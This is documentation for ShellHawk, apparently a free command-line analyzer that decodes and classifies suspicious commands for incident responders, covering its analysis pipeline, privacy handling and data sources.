ShellHawkShellHawk

Documentation

ShellHawk is a free command-line analyzer for incident responders. Paste a suspicious command, get a structured analysis and a shareable permalink.

What it does

ShellHawk analyzes command-line strings and returns a structured verdict covering: obfuscation decoding (base64, UTF-16LE, gzip — up to 5 layers), LOLBAS/GTFOBins binary matching, MITRE ATT&CK technique tagging, LOLDrivers (BYOVD) detection, parent process plausibility scoring, and threat class classification.

Every analysis produces a stable permalink at /c/<slug>. The slug is a base32-encoded SHA-256 of the normalized command, so the same command always resolves to the same URL — submissions are idempotent.

What it is NOT

  • A SIEM, SOAR, or EDR. It does not ingest your logs.
  • A generic shell explainer — explainshell.com serves Linux learners; we serve incident responders looking at hostile commands.
  • A CyberChef replacement — CyberChef lets you build manual recipes; ShellHawk is paste-and-go with a security verdict.
  • A URL scanner — urlscan.io does that. ShellHawk enriches URLs found inside decoded payloads, but URL scanning is not its primary purpose.
  • A file sandbox — ANY.RUN does that. Paste the command you extracted; don't expect file execution.

Analysis pipeline

1. Parsebashlex parses the shell AST. Windows commands and PowerShell are expected to fail the Linux parser — this does not affect the analysis.
2. DecodeRecursive decoding of base64 → UTF-16LE → gzip → repeat, up to 5 layers. Stops at 'complex obfuscation, manual review needed' beyond that.
3. LOLBAS / GTFOBinsBinary-name match against vendored LOLBAS and GTFOBins catalogs, then an argument-similarity score (SequenceMatcher + flag-set Jaccard) against each entry's known abuse examples — distinguishes abuse patterns from benign dual-use.
4. LOLDriversFilename matching against loldrivers.io catalog — flags Bring-Your-Own-Vulnerable-Driver patterns.
5. MITRE ATT&CKTechnique IDs from LOLBAS matches are enriched with names, tactics, and links from the official STIX dataset.
6. Threat classification7 threat classes (dropper, loader, C2/persistence, credential theft, lateral movement, defense evasion, recon) via regex signal rules with high/medium/low confidence.
7. Parent processSuspicion score for the parent→child process pair against known-bad relationships (e.g. winword.exe → powershell.exe = high).
8. VirusTotalURLs extracted from decoded layers are looked up in VirusTotal (read-only — no data submitted). Requires VIRUSTOTAL_API_KEY.

Privacy

ShellHawk is built for analysts who paste real commands from real incidents. Privacy is non-negotiable.

  • Commands are redacted before storage — credentials, internal IPs, and NTLM hashes are masked.
  • No third-party analytics scripts. No Google Analytics, Hotjar, or Segment.
  • VirusTotal enrichment is read-only. We look up URLs VT already knows about; we never submit novel URLs.
  • You can delete your submission at any time. The slug becomes a tombstone — old links show 'deleted', not a broken 404.
  • Public commands are stored in a shared corpus and may appear in search results. If this is a concern, delete after analysis.

Data sources

LOLBAS
LOLBAS-Project/LOLBAS

Vendored as a git submodule, refreshed weekly.

GTFOBins
GTFOBins/GTFOBins.github.io

Vendored as a git submodule, refreshed weekly.

LOLDrivers
loldrivers.io

Fetched via API and baked into build, refreshed weekly.

MITRE ATT&CK
mitre/cti

Enterprise STIX bundle, pinned version, refreshed quarterly.

Open source & feedback

Found a bug or have a feature request? Submit a bug report. No account required.